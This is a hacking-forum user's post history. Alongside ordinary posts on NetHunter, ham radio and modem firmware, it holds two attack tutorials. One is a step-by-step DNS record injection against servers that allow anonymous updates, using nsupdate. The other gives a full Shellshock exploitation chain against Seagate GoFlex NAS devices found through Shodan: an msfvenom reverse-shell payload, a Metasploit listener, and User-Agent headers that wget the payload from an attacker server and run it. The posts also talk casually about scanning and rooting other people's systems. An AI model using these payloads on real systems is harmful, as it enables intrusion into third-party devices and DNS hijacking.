Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - AnarchyAngel

Pages: [1] 2 3
1
Tutorials / Upgrading to NetHunter 2 on Nexus 7
« on: January 24, 2016, 02:57:36 am »
I love Kali so naturally I put NetHunter 1 on my old Nexus 7 tablet and used it for a while but then NetHunter 2 came along and didn't really offer a upgrade path from 1 to 2. Everything was geared to first installs. Lucky for me the process to do so was really easy if you already put NetHunter on your tablet.

Basically all I had to do was put the new NetHunter zip file downloaded from HERE on the root of the sdcard and boot into Fastboot mode "From a powered down stat press and hold the power + volume down buttons" Then selected recovery mode and used teamwin loader "It was still setup from when I first setup NetHunter 1" to install the zip from sdcard and poof NetHunter was updated to the latest. I did lose all data but I don't keep anything on it so that was no big deal.

The one hang up I have found so far is you need to get pciutils for wifite to work. Just run the following command:
Code: [Select]
apt-get install pciutils
Thank you and happy hacking :)

OP: http://aahideaway.blogspot.com/2016/01/upgrading-to-nethunter-2-on-nexus-7.html

2
Tutorials / Exploiting CVE-1999-0184 DNS Poisoning
« on: December 10, 2015, 02:12:33 am »
Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This "guide" is for Kali 2 and the basics of whats going on is the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If its not already on your system you can just run apt.
Code: [Select]
apt-get install dnsutilsNow we will need to start with a file that has all our commands in it. It should look something like this:
Code: [Select]
server 1.2.3.4 #our target DNS server
zone corp.company.com #the zone we are working in.
update delete evil.corp.company.com. A #rm just in case.
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
sendSave the file as dns. Now just run the following command:
Code: [Select]
nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Outgoing update query:
Code: [Select]
;; ->>HEADER<<- i="" id:="" nbsp="" noerror="" opcode:="" status:="" update="">
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com.  IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2Now just run a quick DiG query to make sure it worked.
Code: [Select]
dig @1.2.3.4 A evil.corp.company.com That is all I have for this post. Happy hacking :)

OP: http://aahideaway.blogspot.com/2015/12/exploiting-cve-1999-0184-dns-poisoning.html

3
Tutorials / Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« on: November 22, 2015, 06:28:08 am »
Quote from: Dr4g0n on November 22, 2015, 06:16:05 am
Fucking google-fu was weak today, lol, thanks.

no problem

4
Tutorials / Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« on: November 22, 2015, 05:08:47 am »
Quote from: m0rph on November 22, 2015, 04:21:10 am
You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?

maybe, maybe not.  :P

5
Tutorials / Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« on: November 22, 2015, 05:08:03 am »
Quote from: Dr4g0n on November 22, 2015, 03:52:00 am
Ah, I've never heard of that tool, wish it was open source.

it is open source. - http://www.openvas.org/

6
Tutorials / Re: Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« on: November 22, 2015, 03:41:02 am »
Quote from: Dr4g0n on November 20, 2015, 03:43:10 am
My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.

good guess, but i was using openvas because it was a smaller scope "the ranges i was scanning" and i like its reporting.

7
Tutorials / Getting a remote shell on any one of 68,000+ Seagate GoFlex devices
« on: November 14, 2015, 10:43:27 pm »
I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to shellshock but getting a remote shell was no easy task "for me anyway". I ended up having to build a payload with msfvenom and doing the execution using burp suite and handling the shell with metasploit handler. The best part is this device uses UPNP to tunnel to the Internet, giving us easy access >;)

Start with the payload:

Code: [Select]
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt
Now upload msf.txt to your web server. After the payload is uploaded open metasploit and

Code: [Select]
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
run
That should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:

Code: [Select]
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php2>&1;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:

Code: [Select]
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to our msfconsole window and see a session has opened.  You wont have root at this point but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it but you could try to use linux/x86/exec payload in bash bug exploit module to deploy and execute. This would allow you to keep it all in metasploit.

Original post - http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html
Check it out for more information on this and other posts.

8
Hacking and Security / Re: Malware I Got In An EMail Attachment
« on: June 18, 2014, 02:06:23 am »
what was in the headers? i have found fun info in them from time to time with emails like this.

9
Hacking and Security / Re: Voice spoofing android app???
« on: June 15, 2014, 09:34:47 pm »
i have seen at lest one at a con that not only changes your voice but can add back ground noise like a casino or in the car. not sure if it was a app or a call in type service.

10
Reverse Engineering / reverse engineering modem firmware
« on: January 16, 2014, 06:03:18 pm »
So im trying to modify the firmware of a ddr2200 modem and add a few programs like netcat and so on.


image used - http://home.centurytel.net/ihd/ciscoddr2200/Cisco%20DDR-2200%203.40.5E%20DHCP%20Firmware%20for%20IPTV%20&%20HSI%20over%20ADSL2+%20Bonding.bin


I used binwalk and brfwmod to split the bin into rootfs.bin, kernl.bin, and tag.bin
i then used lzma_unsquash to decompress rootfs.bin and edit the file system, then I zipped it back up but i have no idea how to pack it with the kernl and tag bins to something the modem can use. ideas?

11
General discussion / Re: 9/11
« on: September 11, 2013, 10:52:38 pm »
its marked because like it was said in another reply, it changed the US for ever. For everyone in the US it was the death of a era, and for most a life changing event. it took a confidence from us that helped define our way of life and replaced it with fear, we still have not fully recovered and likely wont for a good while yet.

12
General discussion / Re: ham mods
« on: September 09, 2013, 10:49:27 pm »
Quote from: taters on September 09, 2013, 10:42:02 pm
I have this installed in my car:

http://www.bellscb.com/products/tenmeter/CRE_8900.htm

If you order from bells, he'll do all the work for modding and tuning.


nice thanx, im hoping to find a handheld one for cons and shit.

13
General discussion / ham mods
« on: September 09, 2013, 06:15:09 pm »
Hey EZ, anyone know of a good ham radio i can buy that can be modded to transmit on citizen bands?

14
Hacking and Security / Re: A fun discussion
« on: September 03, 2013, 09:47:15 pm »
if vlan is not an option maybe subnetting is your solution.

15
Tutorials / Re: [tut] Sqlmap
« on: August 21, 2013, 03:43:26 pm »
would be nice to see what you do to find web root for uploading shells if there is no path disclosure with sql error output. I usually try looking in http server config files but they can be a bitch to find.

Pages: [1] 2 3